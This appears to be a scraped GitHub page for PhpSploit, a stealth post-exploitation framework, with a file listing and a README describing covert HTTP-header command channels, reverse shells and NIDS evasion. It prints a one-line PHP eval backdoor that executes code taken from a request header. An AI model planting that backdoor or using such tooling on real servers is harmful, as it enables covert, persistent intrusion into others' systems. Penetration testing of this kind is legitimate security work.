Join GitHub today

GitHub is home to over 20 million developers working together to host and review code, manage projects, and build software together.

Sign up

Python PHP Shell C

Fetching latest commit…

Cannot retrieve the latest commit at this time.

Permalink

Failed to load latest commit information.
data Update phpsploit-demo image for readme Dec 1, 2016
deps remove unneeded dependency Jun 26, 2017
man fix a bunch of spelling and grammar errors Jun 5, 2018
plugins `oracle` plugin: improve connection Jun 2, 2017
src new setting: REQ_POST_DATA (fixes issue #47) Sep 10, 2017
test add connected test for `env` command Nov 30, 2016
utils Add utils script to test phpsploit connected Dec 1, 2016
.gitignore add a missing .gitignore file Jan 9, 2016
CHANGELOG.md update changelog Jan 9, 2016
CONTRIBUTE update `CONTRIBUTE` file Nov 30, 2016
DISCLAIMER updated DISCLAIMER May 22, 2014
INSTALL.md update INSTALL.md Aug 13, 2016
LICENSE adding base doc files to root directory Apr 11, 2013
README.md update README Apr 8, 2017
TODO add `bind` core command Nov 3, 2016
phpsploit add interrupt handler on initialization Dec 6, 2016

README.md

PhpSploit: Furtive post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.


Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Features

  • Efficient: More than 20 plugins to automate post-exploitation tasks

    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids

    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features

    • Detailed help for any command or option (type help)
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported platforms (as target):

  • GNU/Linux
  • BSD Like
  • Mac OS X
  • Windows NT

Get started now !